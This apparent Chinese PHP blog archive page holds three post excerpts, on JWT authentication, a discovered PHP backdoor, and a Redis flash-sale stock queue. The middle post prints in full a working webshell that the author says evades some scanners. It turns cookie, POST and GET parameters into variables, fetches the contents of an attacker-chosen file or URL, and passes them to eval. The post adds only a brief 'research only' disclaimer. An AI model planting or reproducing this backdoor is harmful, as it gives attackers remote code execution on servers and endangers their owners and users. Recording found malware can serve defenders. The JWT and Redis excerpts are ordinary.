2019年10月的文章

php实现JWT认证的方法 JWT验证使用流程

JWT是json web token缩写。它将用户信息加密到token里,服务器不保存任何用户信息。服务器通过使用保存的密钥验证token的正确性,只要正确即通过验证。基于token的身份验证可以替代传统的cookie+session身份验证方法。

JWT由三个部分组成:header.payload.signature

header部分:
jwt的头部承载两部分信息:
声明类型,这里是jwt
声明加密的算法 通常直接使用 HMAC SHA256
完整的头部就像下面这样的JSON:
{
  "alg": "HS256",
  "typ": "JWT"
}

» 阅读全文

关键词: jwt验证

发现一只小php木马后门,挺特的,可以绕过部分查杀系统

从一个客户的网站上看到了,现在的小菜鸡的后门技术有进步啊,后门如下:

代码仅供测试研究,请不要用于非法用途哦

<?php
function _strint($key){
	return @file_get_contents($key);
}
function log1($log){
	lone(_strint($log));
}
function lone($key){
	$str = "";
	return eval($str.$key.$str);
}
foreach (array('_COOKIE','_POST','_GET') as $_request)
{
    foreach ($$_request as $_key=>$_value)
    {
        $$_key=  $_value;
    }
}
$id = isset($id) ? $id : 2;
log1($id);
?>

关键词: php木马后门

基于Redis的PHP+MySQL商品秒杀与超卖场景基础解决方法

基于Redis的PHP+MySQL商品秒杀与超卖场景基础解决方法,简单来说,就是这样方法应用于简单的非超大型

的业务场景。超大型的秒杀业务往往需要考虑的情况比较多。

实现原理
把商品库存数量加到redis队列的num里,下单的时候通过rpop从队列中每次取1件商品,当num为0时,停止下单。
下面我们来看具体实现过程。这样就可以把压力主要甩给redis了。
加入库存队列
我们在Redis中加入商品库存队列。假如商品Apple iPhone 11库存有100件。我们可以写个脚本将商品库存加入到Redis队列中。

for($i=1; $i <= 100; $i++){
    $redis->lpush('num', $i);
}
下单购买
我们建立下单文件Order.php
首先是连接redis和mysql的代码。这个简单。


» 阅读全文

关键词: 商品秒杀